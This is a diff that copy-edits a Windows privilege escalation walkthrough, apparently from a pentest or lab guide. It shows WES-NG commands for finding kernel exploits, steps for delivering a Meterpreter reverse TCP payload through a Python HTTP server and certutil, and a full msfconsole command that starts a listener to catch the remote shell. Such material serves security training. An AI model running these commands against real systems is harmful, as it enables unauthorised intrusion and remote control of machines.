Skip to content

 python3 wes.py --update

-3. Use WES-NG to analyze the gathered system information and identify potential kernel exploits:
+3. Analyze the system information to identify potential kernel exploits:

 python3 wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only

-1. Generate a reverse TCP Meterpreter payload based on the target's architecture (either x86 or x64) and save it as an executable file
+1. Generate a reverse TCP Meterpreter payload for the target’s architecture (x86 or x64) and save it as an executable:

-NOTE: The built-in Local Exploit Suggester module in Metasploit can be used to identify potential kernel exploits.
+Note: Metasploit includes a built-in Local Exploit Suggester module that can help identify kernel exploits.

-2. Host the payload binary using Pythong HTTP server and transfer it to the target Machine with certutil.
+2. Host the payload binary using a Python HTTP server and transfer it to the target with certutil:

-3. On the attacker machine, start a multi-handler listener in Metasploit with the following command:
+3. On the attacker machine, start a multi-handler listener in Metasploit:

 msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 1337; run"